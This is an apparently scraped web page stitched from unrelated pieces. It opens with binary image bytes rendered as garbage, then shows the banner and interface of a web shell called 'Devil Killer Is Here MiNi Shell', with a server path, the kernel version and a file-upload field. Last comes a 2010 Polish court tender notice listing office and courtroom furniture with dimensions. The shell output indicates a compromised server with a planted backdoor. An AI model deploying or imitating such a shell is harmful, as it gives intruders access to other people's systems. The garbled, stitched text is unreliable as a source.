JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101008/325570-N-2010.html

<p class="kh_header"><b>Włocławek: Dostawa i montaż mebli biurowych i sądowych dla potrzeb Sądu Rejonowego we Włocławku.</b><br>
<b>Numer ogłoszenia: 325570 - 2010; data zamieszczenia: 08.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy we Włocławku , ul. Kilińskiego 20, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4222600, faks 054 4118600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli biurowych i sądowych dla potrzeb Sądu Rejonowego we Włocławku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I. Pok. 3/ bud. C- szafa aktowa z drzwiami suwanymi, wys. 265 cm x szer. 200 cm x gł. 50 cm, 1 szt,   pok. 2- drzwi suwane (zabudowa wnęki), wys. 226 cm x szer. 98 cm, 1 szt., półka wisząca, szer. 50 cm x gł. 20 cm, 1 szt., szafka pod drukarkę, wys. 70 cm x dł. 60 cm x szer. 60 cm, 1 szt., pok. 3- drzwi suwane (zabudowa wnęki), wys. 228 cm x szer. 101 cm x gł. 45 cm, 1 szt., półki do zabudowy wnęki, wys. 40 cm, 5 szt., pok. 4- biurko z podstawką wysuwaną na klawiaturę po środku, wys. 84 cm x szer. 135 cm x gł. 65 cm, 1 szt., półka na banknoty, 6 przegródek, każda z nich wys. 20 cm x szer. 30 cm x gł. 20 cm, 1 szt., nadstawka na szafę aktową, 3 suwane drzwi, wys. 80 cm x szer. 350 cm x gł. 40 cm, 1 szt., pok. 5- szafa aktowa, 3 części- 1 część dolna: wys. 80 cm x szer. 90 cm x gł. 40 cm, nad nią 2 część: wnęka o wys. 30 cm x szer. 90 cm x gł.40 cm, 3 część: wys. 140 cm x szer. 90 cm x gł. 40 cm                                                       Cała szafa wys. 258 cm x szer. 90 cm x gł. 40 cm, drzwi suwane, 1 szt., nadstawka na szafę aktową, z 1 półką w środku, dwudrzwiowa, wys. 75 cm x szer. 80 cm x gł. 40 cm, 3 szt., nadstawka na szafę, jednodrzwiowa, wys. 75 cm x szer. 40 cm x gł. 40 cm, 1 szt., pok. 6- nadstawka na szafę, z 1 półką w środku, wys. 50 cm x szer. 120cm x gł. 44 cm, drzwi suwane, 2 szt., szafka, wys. 79 cm x szer. 77 cm x gł. 30 cm, 1 szt., szafka wisząca, wys. 75 cm x szer. 110 cm x gł. 35 cm, 1 szt., pok. 7- nadstawka, wys. 70 cmx szer. 120 cm x gł. 34 cm, 1 szt., szafka gospodarcza (z 1 półką w środku), wys. 80 cm x szer. 60 cm x gł. 30 cm, 1 szt., szafka gospodarcza (z 1 półką w środku), wys. 80 cm x szer. 60 cm x gł. 45 cm, 1 szt., pok. 22a- drzwi frontowe suwane do szafy, wys. 278 x szer. 280 cm, 4 szt., półki do szafy, wys. 41 cm x szer. 38 cm, 10 szt., pok. 21- szafa, wys. 278 cm x szer. 107 cm x gł. 70 cm, 1 szt., pok. 23- szafa aktowa z  4 drzwiami suwanymi:     -7 kolumn:   -1 kolumna z prawej strony o szerokości 40 cm, 5 półek w odległości 50 cm i 1 dolna w odległości 30 cm, - 6 pozostałych kolumn o szerokości 35 cm i odległością od półek 40 cm, w każdej kolumnie 7 półek,   wys. 280cm x szer. 250 cm x gł. 50 cm, 1 szt.,    pok. 100 Kierownik Finansowy -    szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm , 1 szt.,      komoda aktowa ( 3 półki w odległości 40 cm od siebie- wysokość), 3 drzwi,    wys. 80 cm x szer. 120 cm x gł. 50 cm, 1 szt.,    biurko narożne, dłuższe ramię :wys. 80 cm x szer. 230 cm x gł. 60 cm, krótsze ramię szer. 160 cm, gł. 40 cm, 1 szt., kontener 3 szufladowy pod biurko, wys. 75 cm x szer. 60 cm x gł. 60 cm, 1 szt., stolik, wys. 80 cm x szer. 60 cm x gł. 60 cm, 1 szt., Krzesło, 2 szt., szafka narożna, wys. 80 cm x gł. 40 cm, 1 szt., 102 Prezes- szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., 102 Wiceprezes- front do szafy, wys. 124,5 cm x szer. 38,1 cm, 4 szt., front do szafy, wys. 124,5 cm x szer. 47 cm, 2 szt., front do szafy, wys. 98 cm x szer. 47 cm, 4 szt., półka, dł. 40 cm x szer. 31,5 cm, 4 szt., zamek patentowy, 9 szt., pok. 103- szafa aktowa drzwi suwane, wys. 300 cm x szer. 220 cm x gł. 70 cm, 1 szt., biurko, wys. 75 cm x szer. 160 cm z gł. 70 cm, 2 szt., szafa aktowa drzwi suwane, wys. 300 cm x szer. 130 cm x gł. 65 cm, 1 szt., szafka gospodarcza, wys. 75 cm x szer. 100 cm x gł. 40 cm, 1 szt., szafka, wys. 75 cm x szer. 50 cm x gł. 50 cm, 1 szt., krzesło obrotowe, 2 szt, Odbojnica na ścianę, wys. 75 cm x szer. 80 cm x gł. 80 cm, 2 szt., pok. 113- stolik dla interesanta z podstawką do akt, wys. 75 cm x szer. 80 cm x gł. 80 cm, 1 szt., lada drzwi suwane,  wys. 80 cm x dł. 190 cm x szer. 66 cm, 1 szt., pok. 114- biurko (4 szuflady z wnęką pod komputer), wys. 74 cm x szer. 130 cm x gł. 65 cm, 5 szt., szafa aktowa drzwi suwane, wys. 280 cm x szer. 200 cm x gł. 50 cm, 1 szt., szafa ubraniowa narożna,  wys. 280 x szer. 90 cm x gł. 90 cm, 1 szt., słupek dwudrzwiowy, wys. 280 cm x szer. 50 cm x gł. 50 cm, 1 szt., półka wisząca pod drukarkę, wys. 40 cm x szer. 40 cm x gł. 20cm, 2 szt., Odbojnica na ścianę, dł. 275 cm x szer. 20 cm, 4 szt., krzesło obrotowe, 5 szt., pok. 116- biurko, wys. 74 cm x szer. 130 cm x gł. 70 cm, 1 szt., kontener 4 szufladowy pod biurko, wys. 70 cm x szer. 45 cm, 1 szt., dostawka do biurka półokrągła z 1 strony, wys. 74 cm x szer. 60 cm x gł. 60 cm, 1 szt., szafka ( z 1 półką w środku), wys. 74 cm x szer. 80 cm x gł. 60 cm, 1 szt., szafka gospodarcza ( z 1 półką w środku), wys. 74 cm x szer. 100 cm x gł. 60 cm, 1 szt., pok. 127- Biurko, wys. 75 cm x szer. 140 cm x gł. 60 cm, 3 szt., Kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 3 szt., Dostawka do biurek , wys. 75 cm x szer. 120 cm x gł. 45 cm, 3 szt.,  Szafka gospodarcza, wys. 75 cm x szer. 60 cm x gł 40 cm, 1 szt., szafa aktowa, wys. 300 cm x szer. 390 cm x gł. 60 cm, 1 szt., krzesło obrotowe, 3 szt., Odbojnica na ścianę, dł. 570 cm x szer. 27 cm, 1 szt., Odbojnica na  ścianę, dł. 360 cm x szer. 27 cm, 1 szt., szafka pod drukarkę, wys. 74 cm x szer. 60 cm x gł. 60 cm, 1 szt., pok. 129- lada z nadstawką drzwi suwane, wys. 90 cm x dł. 190 cm x gł. 60 cm, 1 szt., szafa aktowa drzwi suwane, wys. 250 cm x szer. 180 cm x gł. 45 cm, 1 szt., biurko narożne, wys. 75 cm x dł. 170 cm (dłuższe ramię), 140 cm (krótsze ramię) x gł. 45 cm, 1 szt., kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 1 szt., krzesło obrotowe, 1 szt., stolik dla interesantów, wys. 75 cm x szer. 80 cm x gł. 80 cm, 1 szt., pok. 134- szafa aktowa drzwi suwane, wys. 300 cm x szer. 210 cm x gł. 55 cm, 1 szt., szafa aktowa drzwi suwane, wys. 260 cm x szer. 210 x gł. 55 cm, 1 szt., pok. 144- biurko, wys. 74 cm x szer. 160 cm x gł. 60 cm, 2 szt., kontener 3 szufladowy, wys. 52 cm x szer. 40 cm x gł. 45 cm, 2 szt., szafka z drzwiami suwanymi, wys. 74 cm x szer. 70 cm x gł. 40 cm, 2 szt., dostawka do biurka, wys. 74 cm x szer. 120 cm x gł. 40 cm, 1 szt., szafa aktowa drzwi suwane, wys. 180 cm x szer. 240 cm x gł. 50 cm, 1 szt., Szafka pod ksero, wys. 74 cm x szer. 60 cm x gł. 50 cm, 1 szt., krzesło obrotowe, 2 szt., szafa aktowa z drzwiami suwanymi, wys. 260 cm x szer.113 cm x gł. 60 cm, 1 szt., pok. 145- biurko, wys. 74 cm x dł. 130 cm x gł. 65 cm, 2 szt., kontener z 3 szufladami, wys. 52 cm x szer. 40 cm x gł. 45 cm, 2 szt., szafa aktowo- ubraniowa z drzwiami suwanymi, wys. 240 cm x szer. 460 cm x gł. 50 cm, 1 szt., komoda 4 szufladowa, 74 cm x szer. 100 cm x gł. 50 cm, 1 szt., krzesło obrotowe, 1 szt., pok. 149- biurko, wys. 76 cm x szer. 130 cm z gł. 70 cm, 1 szt., kontener 4 szufladowy pod biurko, wys. 75 x szer. 40 cm, 1szt., szafa aktowa 4 drzwiowa suwana z wydzieloną częścią ubraniową, odległość między półkami w szafie 35 cm, szerokość półek 60 cm, wys. 252 cm x szer. 200 cm x gł. 55 cm, 1 szt., pok. 210- fotel obrotowy- 1 szt., pok.  212- zabudowa wnęki, wys. 228 cm x szer. 80 cm x gł. 60 cm, 1 szt., szafka gospodarcza, wys. 80 cm x szer. 80 cm x gł. 41 cm, 1 szt., szafka aktowa, wys. 115 cm x szer. 80 cm x gł. 41 cm, 1 szt., szafa aktowa, wys. 187 cm x szer. 80 cm x gł. 41 cm, 1 szt., biurko, wys. 75 cm x dł. 160 cm x gł. 80 cm, 3 szt., szafka, wys. 80 cm x szer. 60 cm x gł. 75 cm, 1 szt., szafka, wys. 60 cm x szer. 80 cm x gł. 75 cm, 1 szt., krzesło obrotowe, 3 szt., pok. 215- Biurko narożne, dłuższe ramię 170 cm, krótsze 150, wys. 75 cm x gł. 60 cm, 1 szt., Kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 1 szt., Szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., Szafa aktowa, wys. 183 cm x szer. 80 cm x gł. 40 cm, 1 szt., Witryna aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Stolik, wys. 75 cm x szer. 60 cm x gł. 60 cm, 1 szt., Szafka gospodarcza, wys. 75 cm x dł. 60 cm x gł. 40 cm, 1 szt., krzesło, 2 szt., Fotel obrotowy  , 1 szt., Odbojnica na ścianę, dł. 360 cm x szer. 27 cm, 2 szt., pok. 215a- Biurko, wys. 76 cm x szer. 130 cm z gł. 70 cm, 4 szt., kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 4 szt., szafa aktowa, wys. 183 cm x szer. 80 cm x gł. 40 cm, 2szt., szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., Witryna aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., szafka gospodarcza, wys. 75 cm x dł. 60 cm x gł. 40 cm, 2 szt., krzesło obrotowe, 4 szt. , Odbojnica na ścianę, dł. 570 cm x szer. 27 cm, 1 szt., Odbojnica na  ścianę, dł. 360 cm x szer. 27 cm, 1 szt., pok. 217- Biurko, wys. 75 cm x dł. 140 cm x gł. 60 cm, 2 szt., Kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 2 szt., Szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., Szafa aktowa, wys. 183 cm x szer. 80 cm x gł. 40 cm, 1 szt., Szafka aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Witryna aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Stolik, wys. 75 x szer. 60 cm x dł. 60 cm, 1 szt., Dostawka do biurek, wys. 75 cm x dł. 120 cm x szer. 45 cm, 1 szt., Szafka gospodarcza, wys. 75 cm x dł. 60 cm x gł. 40 cm, 2 szt., krzesło, 2 szt., krzesło  obrotowe  , 2 szt., odbojnica na ścianę, dł. 570 cm x szer. 27 cm, 1 szt., odbojnica na  ścianę, dł. 360 cm x szer. 27 cm, 1 szt., pok. 219- Biurko, wys. 75 cm x dł. 140 cm x szer. 60 cm, 2 szt., Kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 2 szt., Szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., Szafa aktowa, wys. 183 cm x szer. 80 cm x gł. 40 cm, 1 szt., Szafka aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Witryna aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Stolik, wys. 75 x szer. 60 cm x dł. 60 cm, 1 szt., Dostawka do biurek, wys. 75 cm x dł. 120 cm x szer. 45 cm, 1 szt., Szafka gospodarcza, wys. 75 cm x dł. 60 cm x gł. 40 cm, 2 szt., Krzesło, 2 szt., Fotel obrotowy, 1 szt., Odbojnica na ścianę, dł. 570 cm x szer. 27 cm, 1 szt., odbojnica na  ścianę, dł. 360 cm x szer. 27 cm, 1 szt., pok. 221- Biurko, wys. 75 cm x dł. 140 cm x szer. 60 cm, 2 szt., Kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 2 szt., Szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., Szafa aktowa, wys. 183 cm x szer. 80 cm x gł. 40 cm, 1 szt., Szafka aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Witryna aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Stolik, wys. 75 x szer. 60 cm x dł. 60 cm, 1 szt., Dostawka do biurek, wys. 75 cm x dł. 120 cm x szer. 45 cm, 1 szt., Szafka gospodarcza, wys. 75 cm x dł. 60 cm x gł. 40 cm, 2 szt., Krzesło, 2 szt., Fotel obrotowy, 1 szt., Odbojnica na ścianę, dł. 570 cm x szer. 27 cm, 1 szt., odbojnica na  ścianę, dł. 360 cm x szer. 27 cm, 1 szt., pok. 222- Biurko, wys. 75 cm x dł. 140 cm x szer. 60 cm, 2 szt., Kontener 3 szufladowy, wys. 70 cm x szer. 45 cm, 2 szt., Szafa ubraniowa, wys. 183 cm x szer. 60 cm x gł. 40 cm, 1 szt., Szafa aktowa, wys. 183 cm x szer. 80 cm x gł. 40 cm, 1 szt., Szafka aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Witryna aktowa, wys. 113 cm x szer. 80 cm x gł. 40 cm, 1 szt., Stolik, wys. 75 x szer. 60 cm x dł. 60 cm, 1 szt., Dostawka do biurek, wys. 75 cm x dł. 120 cm x szer. 45 cm, 1 szt., Szafka gospodarcza, wys. 75 cm x dł. 60 cm x gł. 40 cm, 2 szt., Krzesło, 2 szt., Fotel obrotowy, 1 szt., Odbojnica na ścianę, dł. 570 cm x szer. 27 cm, 1 szt., odbojnica na  ścianę, dł. 360 cm x szer. 27 cm, 1 szt.
Zadanie II. S. 20- ława sądowa, dł. 300 cm x wys. 85 cm x gł. 41 cm, 8 szt., stół dla stron, wys. 75 cm x dł. 160 cm x gł. 50 cm, 2 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., ława dla stron, dł 160 cm x wys. 85 cm x gł. 41 cm, 2 szt., boks dla oskarżonych, wys. 125 cm x szer. 170 cm x gł. 110 cm, 1 szt., stół sędziowski, wys. 78 cm x  dł. 350 cm x gł.100 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt., s. 12,13- ława sądowa, dł. 180 cm x wys. 85 cm x gł. 41 cm, 7 szt., stół dla stron, wys. 75 cm x dł. 160 cm x gł. 50 cm, 2 szt., ława dla stron, dł. 160 cm x wys. 85 cm x gł. 41 cm, 2 szt., stół sędziowski, wys. 78 cm x dł. 240 cm x gł. 100 cm, 1 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt., fotel sędziowski niski, wys. 127 cm x szer. 61.5 cm x gł. 59.5 cm, 2 szt., fotel sędziowski wysoki, wys. 137 cm x szer. 61.5 cm x gł. 59.5 cm, 1 szt., s. 115- ława sądowa, dł. 220 cm x wys. 85 cm x gł. 41 cm, 4 szt., stół dla stron, wys. 75 cm x dł. 160 cm x gł. 50 cm, 2 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt., stół sędziowski, wys. 78 cm x dł. 300 cm x gł. 100 cm, 1 szt., ława dla stron, wys. 85 cm x dł. 160 cm x gł. 41 cm, 2 szt., s 117- ława sądowa, dł. 220 cm x wys. 85 cm x gł. 41 cm, 6 szt., stół dla stron, wys. 75cm x dł. 160 cm x gł. 50 cm, 2 szt., ława dla stron, wys. 85 cm x dł. 160 cm x gl. 41 cm, 2 szt., stół sędziowski, wys. 78 cm x  dł. 270 cm x gł.100 cm, 1 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt.,  fotel sędziowski niski, wys. 127 cm x szer. 61.5 cm x gł. 59.5 cm, 2 szt., fotel sędziowski wysoki, wys. 137 cm x szer. 61.5 cm x gł. 59.5 cm, 1 szt., s. 124- ława sądowa, dł. 300 cm x wys. 85 cm x gł. 41 cm ,10 szt., stół dla stron, wys. 75cm x dł. 160 cm x gł. 50 cm, 2 szt., ława dla stron, wys. 85 cm x dł. 160 cm x gl. 41 cm, 2 szt., stół sędziowski, wys. 78 cm x  dł. 350 cm x gł.100 cm, mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt.,  fotel sędziowski niski, wys. 127 cm x szer. 61.5 cm x gł. 59.5 cm, 2 szt., fotel sędziowski wysoki, wys. 137 cm x szer. 61.5 cm x gł. 59.5 cm, 1 szt., s. 146- ława sądowa, wys. 85 cm x dł. 180 cm x gł. 41 cm, 4 szt., stół da stron, wys. 75 cm x dł. 160 cm x gł. 50 cm, 2 szt., ława dla stron, wys. 85 cm x dł. 160 cm x gł. 41 cm, 2 szt., stół sędziowski, wys. 78 cm x  dł. 270 cm x gł.100 cm, 1 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt.,  fotel sędziowski niski, wys. 127 cm x szer. 61.5 cm x gł. 59.5 cm, 2 szt., fotel sędziowski wysoki, wys. 137 cm x szer. 61.5 cm x gł. 59.5 cm, 1 szt., s. 147- ława sądowa, wys. 85 cm x dł. 220 cm x gł. 41 cm, 4 szt., stół dla stron, wys. 75 cm x dł. 160 cm x gł. 50 cm, 2 szt., stół sędziowski, wys. 78 cm x  dł. 300 cm x gł.100 cm, 1 szt., ława dla stron, wys. 85 cm x dł. 160 cm x gł. 41 cm, 1 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt.,  fotel sędziowski niski, wys. 127 cm x szer. 61.5 cm x gł. 59.5 cm, 2 szt., fotel sędziowski wysoki, wys. 137 cm x szer. 61.5 cm x gł. 59.5 cm, 1 szt., s. 148- ława sądowa, wys. 85 cm x dł. 220 cm x gł. 41 cm, 2 szt., stół dla stron, wys. 75 cm x dł. 160 cm x gł. 50 cm, 1 szt., ława dla stron, wys. 85 cm x dł. 160 cm x gł. 41 cm, 1 szt., stół dla stron, wys. 75 cm x dł. 180 cm x gł. 50 cm, 1 szt., ława dla stron, wys. 85 cm x dł. 180 cm x gł. 41 cm, 1 szt., stół sędziowski, wys. 78 cm x  dł. 270 cm x gł.100 cm, 1 szt., mównica, wys. 95 cm x szer. 73 cm x gł. 50 cm, 1 szt., przystawka do stołu sędziowskiego z podstawką pod drukarkę z prawej strony, wys. 78 x szer. 80 x gł. 50 cm, 1 szt.,  fotel sędziowski niski, wys. 127 cm x szer. 61.5 cm x gł. 59.5 cm, 2 szt., fotel sędziowski wysoki, wys. 137 cm x szer. 61.5 cm x gł. 59.5 cm, 1 szt.
Zadanie I. Meble wykonane z płyty laminowanej o grubości nie mniejszej niż 18 mm, Blaty biurek wykonane z płyty laminowanej o grubości nie mniejszej niż 28 mm, W szafach z drzwiami suwanymi: okucia metalowe , wózki jezdne łożyskowane ,  w górnej części zabezpieczenie przed wypadnięciem drzwi z torów, zamki patentowe, tył szafy wykonany z płyty o grubości nie mniejszej niż 5 mm i nie większej niż 10 mm, Drzwi suwane zostały uwzględnione w opisie, pozostałe meble posiadają drzwi otwierane, Kontenery z szufladami wyposażone w zamek centralny, Uchwyty metalowe . Obrzeża  frontów i blatów  oklejone PVC o grubości nie mniejszej niż 2 mm , Pozostałe obrzeża oklejone PVC o grubości nie mniejszej niż 0,6 mm, Fotele obrotowe wyposażone w samohamowne kółka do powierzchni twardych, Fotele obrotowe wykonane ze skóry licowej, Krzesła- tapicerowane siedzisko wykonane z włókna poliolefinowego, chromowana rama, Krzesła obrotowe- tapicerowane siedzisko wykonane z włókna poliolefinowego, ruchome zmieniające swe położenie synchronicznie z oparciem, blokada oparcia w wybranej pozycji, zabezpieczenie przed uderzeniem oparcia w plecy po zwolnieniu blokady, regulacja wysokości oparcia i podparcia lędźwi, regulacja siły oporu oparcia. Zadanie II. Stoły sędziowskie i stoły dla stron wykonane z drewna litego dębowego, Blaty wykonane z masywu dębowego w połączeniu z płytą wiórową i okleina naturalną dębową, Przystawki do stołu sędziowskiego wykonane z drewna litego dębowego, z wysuwką pod klawiaturę oraz miejscem na stację i boczną półką na drukarkę, Ławy dla oskarżonych, mównica, ławy sądowe wykonane z drewna litego dębowego, Fotele wykonane z drewna litego dębowego. Tkanina obiciowa w kolorze bordo, welurowa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.21.00-7, 39.13.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
